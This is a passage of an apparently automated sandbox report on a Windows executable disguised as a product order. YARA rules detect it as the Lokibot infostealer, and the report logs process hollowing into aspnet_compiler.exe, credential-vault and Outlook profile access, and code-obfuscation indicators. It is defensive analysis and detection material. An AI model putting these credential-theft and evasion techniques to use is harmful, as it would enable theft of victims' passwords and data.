                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
                  Source: C:\Users\user\Desktop\Products Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Products Order.exe.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                  Source: C:\Users\user\Desktop\Products Order.exeMutant created: NULL
                  Source: Products Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Products Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Products Order.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Products Order.exe "C:\Users\user\Desktop\Products Order.exe"
                  Source: C:\Users\user\Desktop\Products Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Users\user\Desktop\Products Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: Products Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Products Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Skidomoney.pdb source: Products Order.exe, 00000000.00000002.1966747720.0000000000A50000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204619498.0000000000012000.00000002.00000001.01000000.00000007.sdmp

                  Data Obfuscation

                  barindex
                  Source: Products Order.exe, M8DvjIJE7uNNFCdohc.cs.Net Code: co2gpZP5RqCLJDNbYh(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: Products Order.exe, QMx9nrlke0nNv5xie5.cs.Net Code: QMxl9nrke System.Reflection.Assembly.Load(byte[])
                  Source: Yara matchFile source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                  Source: Products Order.exe, I3ySmwElCsriwLZOkO.csHigh entropy of concatenated method names: 'uy2E7Q04y', 'nj83CchQq0BirOfv59', 'jpOFcFMEHfsMs86Jhn', 'oRoYXqA6jRO4Xf0mpv', 'uZlnM2lNHCx8nPI8AT', 'gE8VKONMnk0yatiwt0', 'UQyPfYYQPYjjTGOuGl', 'NVGoNUaLu8Y8bxS7QP'
                  Source: Products Order.exe, M8DvjIJE7uNNFCdohc.csHigh entropy of concatenated method names: 'xPcjKlyZG63SuLEU3rh', 'evoOipy0DvRetvI86Cx', 'MQjlM4qR8p', 'zOtfHty1fSIGsZLBf9b', 'vhet5CyCuWlOYvhxkm1', 'a67QRDyJVOPOVHcGYB4', 'LYOMdlyH9lWBlstORxk', 'KDikMXewCI', 'l35lhCNtRm', 'BOnlRyYIqV'
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Products Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
